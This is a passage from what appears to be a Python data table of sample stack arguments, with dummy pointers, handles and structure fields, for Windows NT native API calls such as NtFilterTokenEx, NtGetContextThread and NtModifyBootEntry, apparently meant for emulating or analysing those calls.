\"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtFilterTokenEx\": {\r\n \"ntFunc\": \"NtFilterTokenEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to HANDLE NewTokenHandle (dummy pointer, will receive new token handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"RestrictedDeviceGroups (None, no device groups restricted)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"RestrictedDeviceAttributes (None, no device attributes restricted)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"RestrictedUserAttributes (None, no user attributes restricted)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"DeviceGroupsToDisable (None, no device groups to disable)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"DeviceClaimsToDisable (None, no device claims to disable)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"DisableDeviceClaimsCount (0, no device claims to disable)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"UserClaimsToDisable (None, no user claims to disable)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"DisableUserClaimsCount (0, no user claims to disable)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"RestrictedSids (None, no SIDs restricted)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PrivilegesToDelete (None, no privileges to delete)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"SidsToDisable (None, no SIDs to disable)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Flags (0, default behavior)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE TokenHandle (dummy handle to existing token)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtGetCachedSigningLevel\": {\r\n \"ntFunc\": \"NtGetCachedSigningLevel\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to ULONG Flags (dummy pointer, will receive flags)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to ULONG ThumbprintSize (dummy pointer, will receive thumbprint size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000014\"\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to UCHAR Thumbprint (dummy pointer, will receive thumbprint)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xdeadbeef\"\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to BYTE SigningLevel (dummy pointer, will receive signing level)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x06\"\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to ULONG Flags (dummy pointer, will receive flags)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0x00000888\",\r\n \"additionalComment\": \"HANDLE File (dummy file handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtGetCompleteWnfStateSubscription\": {\r\n \"ntFunc\": \"NtGetCompleteWnfStateSubscription\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000030\",\r\n \"additionalComment\": \"DescriptorSize (typical size value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to NewDeliveryDescriptor (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"OldDescriptorStatus (0, default/unused)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"OldDescriptorEventMask (0, default/unused)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to ULONG OldSubscriptionId (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to WNF_STATE_NAME OldDescriptorStateName (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xaabbccdd\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtGetContextThread\": {\r\n \"ntFunc\": \"NtGetContextThread\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to CONTEXT structure (dummy pointer)\",\r\n \"structurePointer\": \"CONTEXT\",\r\n \"structureRef\": \"struct94\",\r\n \"structureValueExpectations\": \"Thread context structure for receiving thread state.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000abc\",\r\n \"additionalComment\": \"HANDLE ThreadHandle (dummy thread handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct94\": {\r\n \"type\": \"CONTEXT\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"ContextFlags\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00010007\",\r\n \"fieldComment\": \"CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS\"\r\n },\r\n {\r\n \"fieldName\": \"Eip\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00401000\",\r\n \"fieldComment\": \"Instruction pointer\"\r\n },\r\n {\r\n \"fieldName\": \"Esp\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x0012ffb0\",\r\n \"fieldComment\": \"Stack pointer\"\r\n },\r\n {\r\n \"fieldName\": \"Eax\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"General purpose register\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtGetCurrentProcessorNumber\": {\r\n \"ntFunc\": \"NtGetCurrentProcessorNumber\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"NtGetCurrentProcessorNumberEx\": {\r\n \"ntFunc\": \"NtGetCurrentProcessorNumberEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for optional PULONG ProcessorNumber parameter\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtGetDevicePowerState\": {\r\n \"ntFunc\": \"NtGetDevicePowerState\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for PDEVICE_POWER_STATE State (output parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000DEAD\",\r\n \"additionalComment\": \"HANDLE DeviceHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtImpersonateAnonymousToken\": {\r\n \"ntFunc\": \"NtImpersonateAnonymousToken\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x0000BEEF\",\r\n \"additionalComment\": \"HANDLE ThreadHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtInitializeRegistry\": {\r\n \"ntFunc\": \"NtInitializeRegistry\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"Options = 1 (e.g., INITREG_CREATE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtInitiatePowerAction\": {\r\n \"ntFunc\": \"NtInitiatePowerAction\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"Asynch = TRUE\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Flags = 0 (no special flags)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"SYSTEM_POWER_STATE = PowerSystemSleeping1 (S1)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"POWER_ACTION = PowerActionSleep\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtIsSystemResumeAutomatic\": {\r\n \"ntFunc\": \"NtIsSystemResumeAutomatic\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"NtLoadKeyEx\": {\r\n \"ntFunc\": \"NtLoadKeyEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK IoStatusBlock (None, not used in this example)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"CallbackReserved (None, reserved parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ObjectContext (None, reserved parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Reserved (None, reserved parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"TrustClassKey (None, not used in this example)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Flags (0, default flags)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES SourceFile (None, not used in this example)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Optional OBJECT_ATTRIBUTES for source file. None if not used.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES TargetKey (None, not used in this example)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"OBJECT_ATTRIBUTES for target key. None if not used.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtLockProductActivationKeys\": {\r\n \"ntFunc\": \"NtLockProductActivationKeys\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to ULONG SafeMode (None, not used in this example)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to ULONG ProductBuild (None, not used in this example)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtLockRegistryKey\": {\r\n \"ntFunc\": \"NtLockRegistryKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE KeyHandle (None, not used in this example)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtMakePermanentObject\": {\r\n \"ntFunc\": \"NtMakePermanentObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE Object (None, not used in this example)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtManageHotPatch\": {\r\n \"ntFunc\": \"NtManageHotPatch\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Unknown parameter, commonly None\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"Unknown ULONG, sample nonzero value\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONGLONG (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x0000000000000002\"\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"Unknown ULONG, sample value\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtMapCMFModule\": {\r\n \"ntFunc\": \"NtMapCMFModule\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Optional pointer to pointer to mapped module (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00400000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Optional pointer to ULONG (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00001000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Optional pointer to ULONG (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Optional pointer to ULONG (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ULONG Index, sample value\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG What, sample value\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtModifyBootEntry\": {\r\n \"ntFunc\": \"NtModifyBootEntry\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to BOOT_ENTRY (dummy pointer)\",\r\n \"structurePointer\": \"BOOT_ENTRY\",\r\n \"structureRef\": \"struct95\",\r\n \"structureValueExpectations\": \"Boot entry structure with identifier, attributes, and file path.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct95\": {\r\n \"type\": \"BOOT_ENTRY\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Version\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Boot entry version\"\r\n },\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000100\",\r\n \"fieldComment\": \"Size of BOOT_ENTRY\"\r\n },\r\n {\r\n \"fieldName\": \"Id\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000010\",\r\n \"fieldComment\": \"Boot entry identifier\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"Sample attribute flags\"\r\n },\r\n {\r\n \"fieldName\": \"FriendlyNameOffset\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000020\",\r\n \"fieldComment\": \"Offset to friendly name\"\r\n },\r\n {\r\n \"fieldName\": \"BootFilePathOffset\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"Offset to boot file path\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtModifyDriverEntry\": {\r\n \"ntFunc\": \"NtModifyDriverEntry\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to DRIVER_ENTRY (dummy pointer)\",\r\n \"structurePointer\": \"DRIVER_ENTRY\",\r\n \"structureRef\": \"struct96\",\r\n \"structureValueExpectations\": \"Driver entry structure with version, flags, and service name.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct96\": {\r\n \"type\": \"DRIVER_ENTRY\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Version\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Driver entry version\"\r\n },\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000080\",\r\n \"fieldComment\": \"Size of DRIVER_ENTRY\"\r\n },\r\n {\r\n \"fieldName\": \"Id\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000005\",\r\n \"fieldComment\": \"Driver entry identifier\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Sample attribute flags\"\r\n },\r\n {\r\n \"fieldName\": \"ServiceNameOffset\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000010\",\r\n \"fieldComment\": \"Offset to service name\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtNotifyChangeDirectoryFileEx\": {\r\n \"ntFunc\": \"NtNotifyChangeDirectoryFileEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"DIRECTORY_NOTIFY_INFORMATION_CLASS, e.g., DirectoryNotifyInformationClassBasic\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN WatchTree, TRUE\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000010A\",\r\n \"additionalComment\": \"ULONG CompletionFilter, e.g., FILE_NOTIFY_CHANGE_FILE_NAME | FILE_NOTIFY_CHANGE_DIR_NAME\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG Length, sample buffer size\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct97\",\r\n \"structureValueExpectations\": \"Status and information fields for I/O completion.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to APC context (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00A0\",\r\n \"additionalComment\": \"Pointer to IO_APC_ROUTINE (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE Event (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000333\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct97\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Operation status\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Operation-specific information\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtNotifyChangeMultipleKeys\": {\r\n \"ntFunc\": \"NtNotifyChangeMultipleKeys\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Asynchronous = FALSE (synchronous operation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"BufferSize = 4096 bytes (typical buffer size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Buffer = None (no output buffer provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"WatchTree = TRUE (monitor subkeys recursively)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"CompletionFilter = REG_NOTIFY_CHANGE_LAST_SET\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct98\",\r\n \"structureValueExpectations\": \"Status and information fields for I/O completion.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ApcContext = None (no APC context)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ApcRoutine = None (no APC routine)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Event = None (no event handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"SubordinateObjects = None (no subordinate OBJECT_ATTRIBUTES)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"Count = 1 (monitoring one key)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"MasterKeyHandle (dummy handle value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct98\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"STATUS_SUCCESS (initial value)\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": 